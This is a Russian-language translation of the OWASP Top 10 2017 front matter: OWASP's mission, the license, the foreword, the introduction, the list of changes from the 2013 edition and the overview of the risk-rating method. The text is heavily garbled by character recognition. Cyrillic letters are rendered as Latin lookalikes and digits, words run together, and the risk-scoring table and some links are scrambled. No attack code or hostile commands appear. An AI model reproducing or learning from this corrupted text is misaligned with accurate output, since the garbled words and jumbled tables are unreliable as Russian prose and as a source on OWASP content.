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06 OWASP 


OTKpbiTbM npoeKT no o6ecneHeHi/iK)6e3onacHOCTi/i Be6- 
npunoxeHMM (OWASP) - sto OTKpbuoe cooOLuecTBO, 
no3BormK)LAee opraHM3aunnM pa3pa6aTbiBaTb, npnoOpeTaTb m 
noAAep>KHBaTb 6e3onacHbie npi/moxem/m m i/iHTepcjDeMCbi 
npnKnaAHoro nporpaMMupoBaHun (API). 

OWASP OecnnaTHO m b OTKpbiTOM AOCTyne npeAnaraeT: 

• CTaHAapTbi m MHCTpyMeHTbi Rnn oOecneneHun 6e3onacHOCTM 
npunoxeHMM; 

• nonHbie Bepcnn kh nr no TecTi/ipoBam/iK) 6e3onacHOCTM 
npunoxeHMM, pa3pa6oTKe 6e3onacHoro koas, a Taxxe ogeHKe 
6e3onacHOCTM koas; 

• npe3eHTaunM m BMAeo : 

• naiym™ no OonbLunHCTBy pacnpocTpaHeHHbixBonpocoB; 

• CTaHAapTHbieTpe6oBaHnn k 6e3onacHOCTM m 6n6nnoTeKn; 

• jiOKanbHbie OTAeneHun no BceMy mi/ipv ; 

• nepeAOBbie uccneAOBaHun; 

• KpynHbie KOHcbepeHUHH no BceMy mhpv ; 

• cm/iCKi/i paccbmoK . 

Bonee noApo6Han MHcjDopMauMn AOCTynHa Ha cav\je\ 

https://www.owasp.org . 

Bee MHCTpyMeHTbi, AOKyMeHTbi, BMAeo, npe3eHTauMM m OTAeneHMH 
OWASP HBJ 1 HIOTCH 6eCnnaTHblMM M OTKpbITbIMM f\H9\ TeX, KTO 
3aMHTepecoBaH BynyHweHMM 6e3onacHOCTM npMnoxeHMM. 

Ooha BbiCTynaeT 3a noAXOAK 6e3onacHOCTM npMnoxeHMM c tohkm 
3peHMH npo6neMbi niOAeM, npoueccoB m TexHonorMM, nocKonbKy p,nn 
HaM6onee 3c|D<t>eKTMBHoroo6ecneHeHMfl 6e3onacHOCTM npMnoxeHMM 
Tpe6yiOTCH ynyHLueHMH bo Bcex stmx o6nacTnx. 

OWASP npeACTaBrmeT co 6 om HOBbiM tmii opraHM3auMM. Hama 
He33BMCMMOCTb OT KOMMepneCKOrO BJ1MHHMH n03B0JlHeT HaM 
npeAOCTaBiiHTb 6ecnpMCTpacTHbie, npaicmnecKMe m 3(f)(|)eKTMBHbie 
AaHHbie no 6e3onacHOCTM npMnoxeHMM. 

OWASP He CBH33H HM C OAHOM TeXHOnOrMHeCKOM KOMnaHMeM, XOTfl 
noAAepxneaeT Mcnonb30BaHMe TexHonorMM npoMbiwneHHOM 
6e3onacHOCTM. OWASP BbinycKaeT 6onbwoe KonMHecTBO 
MaTepnanoB, AeMCTByn npo3panHO m OTKpbiTO, a TaKxe BcerAa totob k 
COTpyAHMHeCTBy. 

Ooha OWASP HBnneTcn HeKOMMepnecKOM opraHM3auMeM, hto 
o6ecnenMBaeT npoeKTy AonrocpoHHbiM ycnex. IIohtm Bee CBH3aHHbie c 
OWASP niOAH sBnniOTCH Ao6poBonbuaMM, BKmoHan nneHOB coBeTa 
OWASP, pyKOBOAHTeneM OTAeneHMM m npoeKTOB, a TaKxe ynacTHMKOB 
npoeKTa. 

Mbi noAAepxMBaeM MHHOBauMOHHbie MccneAOBaHMn b o6nacTM 
6e3onacHOCTM, npeAOCTaBnnn rpaHTbi m mhcJd pacTpyKTypy. 

flpMCOeAHHHMTeCb k HaM! 


ABTopcKne npaBa t/l JlMijeHSHpoBaHHe 


ABTopcKne npaBa © 2003 - 2017 Ooha OWASP 

floKyivieHT BbinymeH noA nni4eH3neM Creative Commons Attribution Share-Alike 4.0. 

B cjiynae nepencnonb30BaHnn hjih pacnpocTpaHeHHn a^hhoto AOKyMeHTa Heo6xoAHMO 
yKa3biBaTb ycnoBHn nnueH3noHHoro corriaLueHi/m, AeficTBytOLAi/ie b ero OTHOLueHHH. 







































IIpeflwcjioBwe 


m 



npeflMCJioBwe 

HeHaflexHoe nporpaMMHoe oOecneneHne noAPbiBaei 6e3onacHOCTb Kpmi/iHecKMX MHcjDpacTpyKTyp, OTHOcruAnxcn, 
HanpMMep, k 3flpaBooxpaHeHMK), oOopoHe, SHepreTMKe nnn cf)MHaHcaM. nporpaMMHoe oOecneneHne CTaHOBMTcn cnoxHee, 
ycipoMCTB, noflKJiK)HeHHbix k ceTM, daHOBmc5q 6ojibLue, noaTOMy BaxHOCTb o6ecneHem/m 6e3onacHOCTM npnnoxeHnn 
B03pacTaeT3Kcn0HeHunajibH0. Bbicipoe pa3Bmne mctoaob pa3pa6oTKM no npnBOAnT k Heo6xoAHMOCTM 6bicipo n 
6e30Lun6oHHO BbmBnflTb, a Taxxe ycTpaHATb HanOonee nacTO B03HMKai0LAne yrpo3bi. BoribLue Henb3n ocTaBnnTb 6e3 
AonxHoro BHMMaHnn OTHOcmeribHO npodbie yrpo3bi 6e3onacHOCTM, noAo6Hbie npeAdaBneHHbiM b a^hhom annexe Ton-10 
OWASP. 

ripn co3AaHHn Ton-10 OWASP - 2017 6bmo nonyneHOorpoMHoe xonnnecTBO OT3biBOB, HaMHoro 6onbine neM no JiK)6biM 
ApyrnM npoexTaM OWASP. Oto noxa3biBaeT, Hacxonbxocoo6iAecTB0 3anHTepecoBaHO b Ton-10 OWASP n HacKonbKO 
BaxHO A-n^ OWASP CAenaTb Ton-1 OaxTyanbHbiM A-rm OonbLUMHCTBa cgeHapneB ncnonb30BaHnn. 

HecMOTpn Ha to, hto nepBOHananbHan genb npoexTa Ton-10 OWASP 3axniOHanacb b npocTOM npnBneHeHMH BHHMaHi/m 
pa3pa6oTHMKOB i/i MeHeAxepoB k npoOneiviaivi 6e3onacHOCTH, npoexT Ae-cfnaxTO cran CTaHAa ptom 6e3onacHOCTH 
npnnoxeHHM. 

B 3tom Bbinycxe npoOneMbi n pexoMeHAagnM no mx ycipaHeHmo onncaHbi KpaTKO n b AOCTynHon cfcopMe ajih oOnerneHnn 
BHeApeHMfl Ton-10 OWASP b nporpaMMbi oOecneneHi/m 6e3onacHOCTM npnnoxeHnn. KpynHbiM n 

BbicoKonpoM3BOAmejibHbiM opraHM3aunflM, KOTopbiM TpeOyeicn HacioniAHM CTaHAapT, Mbi peKOMeHAyeM ncnonb30BaTb 

CiaHAapT noATBepxaeHHn 6e3onacHOCTM npnnoxeHnn OWASP (ASVS) , hoa^ OonbLUMHCTBa, npn oOecneHeHnn 
6e3onacHOCTM npnnoxeHHM, 6yAeT AOCTaTOHHO Ton-10 OWASP. 

Mbi Taxxe cocTaBnnn nepenHH pexoMeHAyeMbix LuaroB p,nn pa3Hbix xaTeropnn nonb30BaTenen Ton-10 OWASP, Taxne xax 

Hto ziejiaTb pa3pa6oTHnxaM , Hto nenaTb TecTHpoBLLLHxaM , Hto nenaTb opraHH3aunnM (a^h A^pexTopoB no 
1/iHcjDopMam/ioHHbiM TexHOJiomflM n AnpeKTopoB no MHcjDopMaui/ioHHOM 0e3onacHocTn), a Taxxe Hto nejiaTb MeHenxepaM 
npi/moxeHHH (arm MeHeAx:epoB npmioxeHMM MnM nng, OTBeTCTBeHHbix 3a xi/i3HeHHbin gnxn npnnoxeHHH). 

B KOHenHOM cneTe, Mbi npM3biBaeM Bee KOMaHAbi m opraHM3auMM, 3aHMMaK)LAMecn pa3pa0oTxon no, C03AaTb nporpaMMy 
oOecneneHMfl 6e3onacHOCTM npMnoxeHMM, xoTopan OyAeT cooTBeTCTBOBaTb mx KynbTypHOMy m TexHonornnecxoMy ypoBHio. 
Otm nporpaMMbi MoryT 6biTb npeACTaBneHbi b moGon cpopMe m oO-beMe. flnn ogeHxn m ynyHLueHHn cymecTByiOLAeM 
nporpaMMbi oOecneneHnn 6e3onacHOCTM npMnoxeHMM b BaLuen opraHM3auMM Bbi MOxeTe Mcnonb30BaTb Mouenb 

oOecneHeHnn 6e3onacHOCTM flO (SAMM) . 

HaAeeMcn, hto Ton-10 OWASP oxaxeTcn none3HbiM npM oOecneHeHnn 6e3onacHOCTM Bawnx npMnoxeHMM. Bee Bonpocbi, 
KOMMeHTapMM m MAeM Bbi MOxeTe ocTaBnnTb b HaiueM npoexTHOM peno3MTopMM Ha GitHub: 

• https ://g ith u b. com/O WAS P/T op 10/issues 
Ton-10 OWASP m nepeBOAbi moxho h3mtm 3Aecb: 

• https://www.owasp.org/index.php/top10 

HaKOHeg, Mbi xotmm noOnaroAapnTb ocHOBaTenen npoexTa Ton-10 OWASP, fleMBa Bnnepca (Dave Wichers) m flxectncpa 
BnnbHMca (Jeff Williams), 3a mx BxnaA n eepy b ycnewHoe 3aBepmeHMe AaHHoro AOxyMeHTa CTapaHi/mMH coo0iA6CTBa. 
Bonbuioe BaM cnacnOo! 

• Ohapk) BaH a©P Ctok (Andrew van der Stock) 

• BpanaH Tnac (Brian Glas) 

• Hen/i C/v\MT/iaMH (Neil Smithline) 

• TopcTeH fnrnep (Torsten Gigler) 


noflflepxcKa npoeKTa 


BnaroAapMM kom naHnio Autodesk 3a cnoHCopcKyjo noflAepxKy Ton-10 OWASP 2017.OpraHH3aunn n OTAenbHbie nnua, npeAOCTaBnBLune 
AaHHbie no npeo6/iaAaK)LAHM yn3BHMOcmM nnn OKa3aBLune nHoe coAencTBne npn co3AaHnn cnucKa, nepenncjieHbi Ha CTpaHnue 

"BjiaroAapHQCTM" . 

















IIpeACTaBjiaeM Ton-10 OWASP 2017! 


3to Kpyrmoe oSHOBJieHMe BxmonaeT b ce6n HecKonbKO hobhx xaTeropMM yrpo3, Aee M3 KOTopbix 6bmn BbiSpaHbi cooOmecTBOM 
( A8:2017-He6e3onacHaRflecepnajiM3auM^ m A10:2017-HenocTaTKM xypHannpoBaHMn m MOHmopuHra ). flBa xnioneBbix OTJiMHi/m 
nOflrOTOBKM A3HH0M BepCMM Ton-10 OWASP 3axnK)HaiOTCn B aXTMBHOM o6paTHOM CBH3M C 006 LAeCTBa M BHyLLImenbHOM o6"beMe 
AaHHbix, nonyHeHHOM ot a6Chtxob opraHM3auMM, bo3moxho, caMOM OonbwoM M3 xorAa-nM6o co6paHHbix npM noAroTOBKe 
CTaHAapia no oOecneneHMio 6e3onacHOCTM npMnoxeHMM. Bee sto AaeT HaM yBepeHHOCTb b tom, hto HOBan Bepcnn Ton-10 
OWASP nocBflmeHa caMbiM axTyanbHbiM npoOneMaM 6e3onacHOCTM npMnoxeHMM, c xotophmm CTanxMBaiOTCH opraHM3aunn b 
H acTomuee BpeMn. 

Ton-10 OWASP 2017 ocHOBaH rnaBHbiM o6pa30M Ha 40+ xoMnnexTax AaHHbix, nonyneHHbix ot opraHM3auMM, KOTopbie 
cnei4nann3npyK)Tcn Ha 6e3onacHOCTM npMnoxeHMM, a Taxxe Ha OTpacneBbix MecneAOBaHMnx, npoBeAeHHbix 6onee 500 
He3aBMCMMbiMM MecneAOBaTennMM. flaHHbie coAepxaT MHcjDopMaiiMK) 06 yn3BMM0CTnx, oOHapyxeHHbix b coTHnx opraHM3auMM m 
6onee 100.000 peanbHbix npMnoxeHMM m API. Ha ocHOBe AaHHbix o pacnpocTpaHeHHOCTi/i, npocTOTe axcnnyaTauMM m cnoxHOCTM 
o6HapyxeHnn yn3BMM0CTeM, a Taxxe ymep6e, xoTopbiM ohm MoryT HaHecTM, cocTaBnneTcn cnncoK Ton-10. 

Ochobhom uenbio Ton-10 OWASP nBnneTcn 03H3KOMneHMe pa3pa6oTHMxoB, npoeKTMpoBLAMKOB, apxMTeKTopoB, MeHeAxepoB m 
opraHM3auMM b uenoM c pMexaMM, CBH3aHHbiMM c HanOonee pacnpocTpaHeHHbiMM m cymecTBeHHbiMM HeAOCTaTKaMM b 
6e3onacHOCTM Be6-npMnoxeHMM. Ton-10 Taxxe npeAnaraeT 6a30Bbie cnocoSbi 3aLAMTbi ot noAoSHbix pmckob m pyxoBOACTBa no 

AanbHeMLLIMM Ae^CTBMHM. 


flqpcDKHan Kspra. flantHewuiMx fleworBMw 


He ocTaHaB/iMBaiiTecb Ha 10. CymecTByioT cothu yrpo3, KOTopbie 
MoryT noBJiMHTb Ha 6e3onacHOCTb Be6-npnnoxeHHM. 3 tom TeMe 
nocBHineHbi Pvxoboactbo pa3pa6oTHi/ixa OWASP m naMnTXH OWASP . 
flaHHbie AOKyMeHTbi pexoMeHAyxyrcn Ann npoHTeHi/m BceM 
pa3pa6oTHm<aM Be6-npnnoxeHMM m API. 1/lHCTpyxui/m no 
3c|Dc|DeKTMBHOMy o6HapyxeHmoyn3BMMocTeM b Be6-npmioxeHi/mx m 
API npeflCTaBiieHbi b PvxoBOACTBe OWASP no TecTMPOBaHwo . 

npoflo/ixaMTe coBepiueHCTBOBaTbCB. Ton-10 OWASP He ctomt Ha 
MecTe i/i npoAonxHT MeHHTbcn. flaxe 6e3 BHeceHMn KaKMX-nn6o 
npaBOK b koa b npnnoxeHnnx MoryT nonBMTbcn yn3BHMOCTM, 
nocKoiibKy oSHapyxMBaioTcn HOBbie BexTopbi aTax, a MeTOAbi 
3KcnnyaTaunM yn3BMMOCTeM coBepiiieHCTByioTcn. fljin nonyneHHn 
AOnOJlHMTeilbHOM MHCfDOpMaUMM peKOMeHAyeM 03HaXOMMTbCH c 
coBeTaivm, npeACTaBJieHHbiMi/i b xoHLje Ton-10 b pa3Aenax "Hto 
A enaTb Pa3pa6oTHnxaM . TecTnpoBmnxaM . OpraHH3ai_innM n 
MeHeAxepaM npnnoxeHi/iM ". 

MblCJlHTe n 03 MTMBH 0 . ECJ 1 I/I Bbl XOTMTe npexpaTMTb MCKaTb yH 3 BHMOCTM 
i/i roTOBbi nepeMTM k co 3 AaHmo HaAexHOM CMCTeMbi o 6 ecneHeHMH 
6 e 3 onacHOCTM npnnoxeHHM, to b xanecTBe OTnpaBHOM tohxm Ann 
pa 3 pa 6 oTHMKOB MOxeT nocnyxMTb npoexT Peann 3 ai_inn npoaxTHBHon 
3 aLAMTbi OWASP . a CTaHAapT noATBepxAeHt/in 6 e 3 onacHocTM 
npMJioxeHMM OWASP (ASVS) CTaHeT xoponimvi pyKOBOACTBOM Ann 
npoBepnfOLAHX opraHM 3 aunM h npwioxeHMn no BbiOopy napaMeTpoB, 
noAJiexaLAMX kohtpojiio. 

HcnoAb3yMTe MHCTpyMeHTbi rpaMOTHO. Yhsbmmoctm MoryT 6biTb 
KOMnneKCHbiMM m CKpbiBaTbcn rnySoKO b KOAe. B 6onbniHHCTBe 
cxiynaeB Han6onee 3c|Dc|DeKTi/iBHbiM noAXOAOM k noMCKy m ycTpaHeHmo 
HeAOCTaTKOB b 6e3onacHOCTM HBJineTcn npHBJieneHMe 3KcnepTOB, 
BoopyxeHHbix npoABMHyTbiMH HHCTpyivieHTaMM. Ho He peKOMeHAyeTcn 
nonaraTbcn MCKmoHHTeiibHO Ha MHCTpyMeHTbi, nocKoiibKy sto AaeT 
noxHoe OLAyLAeHHe 6e3onacHOCTM. 

PasBHBaMTecb bo Bcex HanpaBJieHMHx. CocpeAOTOMbTecb Ha tom, 
HTo6bi cAenaTb 6e3onacHocTb HeoTteMneMon nacTbio Bamew 
KyiibTypbi pa3pa6oTKM. flonojiHHTexibHyio HHcfDopMaumo moxho 
nonyHMTb, 03HaK0MHBLuncb c MoAeiibK) o6ecneHeHMH 6e3onacHocTn 
no (SAMIVh . 


PIcto^ihukh 


Mbi OnaroAapHbi opraHM3auMHM, KOTopbie npeAOCTaBMnM 
MHcfDopMauMK) o6 yn3BMM0CTnx Ann Bbinycxa oOHOBneHMn 2017. Ha 
npM3biB o c6ope AaHHbix Mbi nonynMnM 6onee 40 otioimkob. 
BnepBbie BceAaHHbie, coOpaHHbie Ann Bbinycxa Ton-10, a Taxxe 
nonHbiM cnncoK ynacTHMKOB npoexTa AOCTyneH ny6nMHHO. Mbi 
nonaraeM, hto sto OAHa M3 caMbix 6onbLUMx m pa3HOCTopoHHMx 
6a3 AaHHbix no yn3BMM0CTnM, KOTopan KorAa-nnOo coOnpanacb 
nyOnMHHO. 

riocKonbKy ynacTHMKOB npoexTa HaMHoro Oonbrne, neM 
AOCTynHoro3Aecb MecTa, Mbi co3AanM cneuManbHyio CTpaHMuv c 
yxa3aHMeM BHeceHHoro mmm BKnaAa. Mbi MCKpeHHe6naroAapMM 
opraHM3auMM 3a mx pemeHMe oxa3aTbcn Ha nepeAOBOM m 
noAenMTbcn cbommm AaHHbiMM c cooOLAecTBOM. HaAeeMcn, hto 
noAo6Han npaxTMxa 6yAeT npoAonxaTbcn m Bee OonbLue 
opraHM3auMM 6yAeT b stom ynacTBOBaTb; bo3moxho, sto CTaHeT 
oahmm m 3 KmoneBbixsTanoB b peanM3auMM 6e3onacHOCTM Ha 
ocHOBe c})aKTMHecKMx AaHHbix. Co3AaHMe Ton-10 OWASP 6bino 
6bi HeB03M0XHbiM 6e3 ynacTMn BcexaTMxyAMBMTenbHbixniOAeM. 

Taxxe Mbi xotmm no6naroAapMTb 6onee 500 ynacTHMKOB npoexTa, 
KOTopbie noTpaTMnM CBoe BpeMn Ha 3aBepLueHMe AaHHoro 
MecneAOBaHMH. MHeHMn STMxniOAeM noMornM BbiAenMTb Aae 
HOBbie xaTeropMM Ann Ton-10. Mbi ueHMM Bee KOMMeHTapMM, 
BbiCKa3biBaHMn m xpMTMHecKMe 0T3biBbi, a Taxxe noTpaneHHoe 
BpeMn m xotmm Bbipa3MTb B3M Hamy OnaroAapHOCTb. 

Xotmm noOnaroAapMTbynacTHMKOB, KOTopbieocTaBnnnM cbom 
KOHCT pyKTMBHbie 33MeHaHMn M TpaTMnM BpeMn Ha 
peueH3MpoBaHMe HOBoro Bbinycxa Ton-10. Ha cxonbxoaTO 
bo3moxho, Mbi nepeHMcnMnM mx Ha CTpaHMue ‘ BnarPAapHOCTM ’. 

1/1 HaxoHeu, xotmm 3apaHee noOnaroAapMTb Bcex nepeBOAHMxoB, 
xoTopbie 6yAyT nepeBOAMTb AaHHbiM Bbinycx Ton-10 Ha 
pa3nMHHbien3bixM, noMoran TeM caMbiM CAenaTb Ton-10 OWASP 
6onee AOCTynHbiM. 




























□ 



^TO HOBOrO 


*Ito M3MeHMjioct» b 2017 rofly no cpaBHGHHK) c 2013 -m? 

MHoroe M3MeHnnocb3a nocneflHne neTbipe rofla, noaTOMy Ton-10 OWASP TaKxeTpeSoBanncb M3MeHeHnn. Mbi no/iHOCTbK) peopraHH30Bann Ton-10, o 6 hobhjih 

MeTOAOJiornK), npuMeHnnn HOBbin npouecccSopa AaHHbix, HanaAnnn B3anM0AencTBnec cooSmecTBOM, nepecMOTpenn ypoBHM kpmtmhhoctm, nepenncann Bee 

yrpo3bi c Hy/in n AoOaBMJin ccbiriKM Ha Han6o;iee pacnpocTpaHeHHbie cfDpenMBopKM m H3biKM. 

3a nocneAHMe roAbi ocHOBHbieTexHonornn n apxMTeKTypa npnnoxeHnn cnnbHo M3MeHnnncb: 

• MMKpocepBHCbi, HanMcaHHbie Ha node.js m Spring Boot, 3 aMeHniOT TpaAMunoHHbie MOHonnTHbie npnnoxeHMn. C npMxoAOM MMKpocepBncoB npn 6 aBMnocb 
npoSneM c 6 e 3 onacHOCTbio, tokmx k3k ycTaHOBneHne Aoaepnn MexAy MMKpocepBncaMM, KOHTenHepaMM, ynpaBneHne KpMTMHHbiMM ashhumm m t. n. Koa, k 
KOTopoiviy paHbLue He npeAnonaranocb oOpameHMe nepe 3 MHTepHeT, Tenepb pacnonaraeTcn 3 a API nni/i BeS-cepBMcaMM RESTful m MOxeT SbiTb ncno;ib 30 BaH 
OAHOCTpaHMHHbIMM M MOOMflbHblMM npMJlOXeHMHMM. ApXMTeKTypHbie AOnymeHHH B KOAe, KaCafOlAMeCH, HanpMMep, AOBepeHHblXBbl 3 blBaK)LAMXC| 3 yHKAMM, 6 onee 
He aKTya/ibHbi. 

• OAHOCTpaHMHHbie npmioxeHMH, pa3pa6oTaHHbie c ncnojib30BaHneM JavaScript-ctDpeMMBopKOB (tokmx xax Angular m React), no3BonniOT co3AaBaTb 
MHorocjDyHKAMOHa/ibHbie, MOAy.nbHbie MHTepcjDeMCbi. OyHKAMOHanbHbie bo 3 moxhoctm KJineHTOB, KOTopbieTpaAnuMOHHOoSecneHMBanMCb Ha CTopoHe cepBepa, 
Taxxe Ao6aBJiHK)T npoOneM c 6e3onacHOCTbio. 

• JavaScript b HacTonmee BpeMn HB/ineTcn ocHOBHbiM H3biK0M b cen/i MHTepHeT, node.js paSoTaeT Ha CTopoHe cepBepa, a coBpeMeHHbie Be6-cJ)peMMBopKM 
(TaKMe Kax Bootstrap, Electron, Angular m React) 3anycKaiOTcn b KJiMeHTax. 

HoBbieyrpo3bi, BbiAeneHHbie Ha ocHOBe AaHHbix: 

• A4:2017-BHeiiJHMecvmHOCTMXML(XXE) - HOBan KaTeropMn, BbiAeneHHan Ha ocHOBe AaHHbix, nonyneHHbixnpM noMOLAM MHCTPVMeHTOB TecTMpoBaHMn 
6e3onacHQCTM ncxoAHoro koab (SAST). 

HoBbie yrpo3bi, BbiAeneHHbie cooOmecTBOM: 

Mbi nonpocMJiM cooSmecTBO paccMOTpeTb Aae nepcneKTMBHbie KaTeropMM yrpo3. nonyHMB 6onee 500 peueH3MM m mckjikjhmb yxe BbiAeneHHbie yrpo3bi (Taxne 

Kax "Pa3maLueHMe KOHcjDMAeHLiManbHbix AaHHbix" m "BHeujHMecymHOCTM XML"), 6buiM BbiOpaHbi cneAyK)LAne KaTeropMM: 

• A8:2017-He6e3onacHan AecepnanM3auMfl , KOTopan no3BOJineT yAaneHHO BbinonHMTb koa MnM ocymecTBMTb as^ctbmh c KpMTMHHbiMM oSteKTaMM. 

• A10:201 7-HeAQCTaTKMxypHajiMpoBaHMB m MOHMTopMHra , KOTopbie MoryT noMewaTb oSHapyxeHMio BpeAOHOCHbix aomctbmm mjim b 3 jiomob, pearMpoBaHMio Ha 
MHAMAeHTbi, a TaKxe paccneAOBaHMio KMSepnpecrynneHMM. 

06-beAMHeHHbie uni* MCKJitoHeHHbie, ho He 3a6biTbie: 

• A4-He6e3onacHbie npnMbie ccnjikm Ha oS'beKTbi m A7-OTcyTCTBMe KOHTponn AOCTyna Ha cfryHKUMOHanbHOM ypoBHe o6-beAHHeHbi b A5:2017-HeAQcraTKM 
KOHTpOJIB AOCTVna . 

• A8-MexcaMTOBaa noAMeHa3anpocoB(CSRF) 6bina oOHapyxeHa TonbKO b 5% npMnoxeHMM, nocKonbKy 6onbi±iMHCTBO cjDpeMMBopKOB MMeiOT cpeACTBa 

3amMTbl ot CSRF . 

• A10-HenpoBepeHHbie nepeHanpaBneHMn m nepeaApecauMM 6binM oOHapyxeHbi npMMepHO b 8% npMnoxeHMM, ho AaHHan KaTeropMn 6bina BbiTecHeHa 
BHeLLIHMMM CyLAHOCTHMM XML (XXE). 


Ton-10 OWASP 2013 

* 

Ton-10 OWASP 2017 

A1 - BHeflpeHMe 

* 

A1:2017-BHeflpeHiie 

A 2 - HeAOCTaTKM ayTemndpmaum m ynpaBJieHMH ceccMHMM 

* 

A 2 : 2017 -HeAOCTaTKM ayTemiACpmauyiM 

A 3 - MexcaMTOBoe Bbino/iHeHne cueHapweB (XSS) 


A 3 : 2017 -Pa 3 rnaiueHMe KOHc|DMAeHUMajibHbix AaHHbix 

A 4 - He 6 e 3 onacHbie np^Mbie ccbiJiKM Ha o 6 i>eKTbi [ 06 -beflMHeHO 
A7] 

IC 

u 

A 4 : 2017 -BHeiuHMe cyiAHOCTM XML (XXE) [HoBoe] 

A 5 - HeKoppeKTHaa HacTpofixa napaMeTpoB 6 e 3 onacHOCTM 



A 5 : 2017 -HeAOCTaTKM kohtpojih AOCTyna [ 06 -beAMHeHo] 

A6 - PasrnanieHMe KOHcfMAeHUMajibHbix AaHHbix 


* 

A 6 : 2017 -HeKoppeKTHaH HacTpoMKa napaMeTpoB 6 e 3 onacHocTM 

A 7 - OTcyTCTBMe kohtpojih AOCTyna Ha 4 >yHKLiMOHajibHOM ypoBi 

[ 06 -beAMHeHoc A4] < 

e 

u 

A 7 : 2017 -MexcaMTOBoe Bbino/iHeHMe cueHapneB (XSS) 

A 8 - MexcaMTOBan noAMeHa 3 anpocoB (CSRF) 

n 

A 8 : 2017 -He 6 e 3 onacHaH AecepMaxiM 3 auMH [HoBoe, CooSiuecTBo] 

A 9 - Mcn 0 J 1 b 30 BaHHe KOMnOHeHTOB C M 3 BeCTHblMM yHSBMMOCTFIMM 


A 9 : 2017 -l/lcnojib 3 OBaHMe KOMnOHeHTOB c M 3 BecTHbiMM 

yH 3 BMMOCTHMM 

A 10 - HenpoBepeHHbienepeHanpaBJieHMH m nepeaApecauMM 

X 

A 10 : 2017 -HeAOCTaTKM xypHa/iMpoBaHMH m MOHMTopMHra [HoBoe, 
CooGiuecTBo] 
























































yrp 03 H 


yrposw 6 e 3 onacHOCTM 
npnn o»:e hum 



*Ito TaKoe yrpo3M 6e3onacHOCTM npnjioxeH mm? 


3noyMbiLuneHHMKM MoryT HaHecTM ymep6 BameMy 6n3Hecy mjim opraHM3ai4MM, Mcnojib3ya Baiue npMJioxeHMe. l1oAo6Hbie 
cnoco6bi Mcnorib30BaHMfl npMJioxeHMH npeACTaBJiniOT co6om yrpo3bi, KOTopbie MoryT (mjim He MoryT) 6biTb AOCTaTOHHO 
Cepbe3HblMM, HT06bl 06paLAaTb Ha HHX BHMM3HMe. 


Mctohhmkm 

yrpo3 


Beicropbi 

aiax 


HefloCTaTKM HaCTpOMKM 
6e3onacHOCTM 6e30naCH0CTM 


TexHunecKiie 

nocjieACTBMfl 


riOCJieACTBMfl 

AJifl 6n3Heca 


■ ■ ■• Aiaxa 



HeAOCTaTOK > r ■#HacTpotiKa ) a m a 


■ HeAOCTaTOK # K-B0H a CTpoMKa ■ ■ 1 


HeAOCTaTOK 



1= qOCTaTOK #^^HacT| 



lOCJieACTBMfl 


riOCJieACTBMB 

flOCneflCTBHB 


MHorAa otm cnoco6bi nerKO hsmth h SKcnnyaTHpoBaTb, i/morAa - oneHb ctioxho. AHanorHHHan CMTyauMH c B03M0XHbiM 
yLAep6oM: ero MOxeT He 6biTb coBceM mjim oh MOxeT jiMLUMTb Bac 6M3Heca. HTo6bi onpeAe/iMTb pmckm atia BameM 
OpraHM3ai4MM, OUeHMTe BepOHTHOCTM, CBH3aHHbie C MCT0HHMK3MM yrp03, BeKTOpaMM aTaK M HeAOCTaTKaMM 6e30naCH0CTM, a 
3aTeM o6"beAHHMTe mx c ouchkom TexHMnecKoro m penyTauMOHHoro BpeAa Arm BameM opraHM3auMM. CyMMa stmx c|3aKTopoB 
onpeAe-nneT coBOKyrmbiM pmck. 


Hto MHe rp03MT? 


CCBUIKW 


TnaBHOM 3aAaneM Ton-10 OWASP nBrmeTcn onpeAeneHne HanOonee cepbe3Hbix yrpo3 
6e3onacHOCTM Be6-npnnoxeHMM ajih mnpoKoro Kpyra opraHH3aunn. flrm ksxaom M3 stmx 
yrpo3AaeTcn o6man nHcjDopMaunn o BeponTHOCTM ee B03HMKH0BeHnn m B03M0XHbix 


TexHMHecKMX nocneACTBnnx, nonyneHHafl m ncnonb30BaHneM MeTOziMKH oueHKM puckob 
OWASP. 


Mctohhmkm 

yrpo3 

C/lOXHOCTb 

SKcnnyaTauMM 

PacnpocTpaHeHHOCTb 

yH3BMM0CTM 

C/lOXHOCTb 

o6HapyxeHMn 

TexHMHecKMe 

nocneACTBMfl 

riocjieACTBkm 

AJlH 

6M3Heca 

3aBMCMTOT 
npmioxeHMH 

flpocTo: 3 

OneHb 

pacnpocTpaHeHHafl: 

3 

flpocTo: 3 

THxenbie:3 

SaBMCMT 

OT 

6M3Heca 

CpeAHe:2 

PacnpocTpaHeHHan: 2 

CpeAHe: 2 

YMepeHHbie:2 

Cjioxho: 1 

PeAKan: 1 

Cjioxho: 1 

He3HaHmejibHbie: 

1 


B 3tom BbinycKe Mbi o6HOBnnn CMCTeMy oueHKM puckob atih oOnerneHnn pacneTa 
BepoflTHOCTn B03HHKH0Bem/in m B03MOXHoroymep6a p,nn jik)6om yrpo3bi. Bonee noApoOHyro 
nHcjDopMaunK) moxho y3H3Tb b pa3Aene 06 yrpo3ax . 

HeT OAMHaKOBbix opraHH3aunM, KaK HeT OAMHaKOBbix 3JioyMbnuneHHHKOB, uenen n 
nocneACTBHM aTaK. Ecnn OAHa opraHH 3 aunn ncnoiib 3 yeT Hexyto cncTeMy ynpaBneHun 
KOHTeHTOM (CMS) p,nn nyOnMKauMM HOBOCTen, a CMCTeMa 3 ApaB 00 xpaHeHnn ncnonb 3 yeT 
Taxyro xe CMCTeiviy ajih xpaHeHnn mgamumhckmx AaHHbix, to yrpo 3 bi n pncxn atih stmx 
opraHM 3 aunM 6 yAyTcmibH 0 OTnunaTbcn. OneHb BaxHO onpeAennTb pncxn ajih BameM 
0praHM3aUMM, MCX0AH M3 npMMeHMM bIX K HeM yrp03 M B03M0XHblX nOCJieACTBMM aTaK. 

TAe 3T0 B03M0XH0, f\Y\9\ yHMCf) MK3LJMM oOmenpMHHTblX HaMMeHOBaHMM M CHMXeHMH pMCKa 

B03HMKH0BeHMn nyTaHMLjbi, Ha3BaHMn yrpo3B Ton-10 cooTBeTCTByroT Ha3BaHMHM 
yn3BMM0CTen M3 cnncxa OWE . 


OWASP 

• MeTOAMKa OUeHKM pMCKOB OWASP 

• Pa3Ae/1 O MOAe/IMpOBaHMM 

yrp03/pMCK0B 


CTOpOHHMe 

• ISO 31000: MeHenxMeHT pmckob 

• ISO 27001: MeHenxMeHT 

MHCfropMaLlMOHHOM 6e30naCHQCTM 

• OpeMMBopK KM6ep6e3onacHQCTM 

NIST (US) 

• MeTOAbi vcTpaHeHMH nocjiencTBMM 

KM6epaTax (AU) 

• NIST CVSS3.Q 

• CpencTBa MonejiMpoBaHMH vrpo3 

Microsoft 
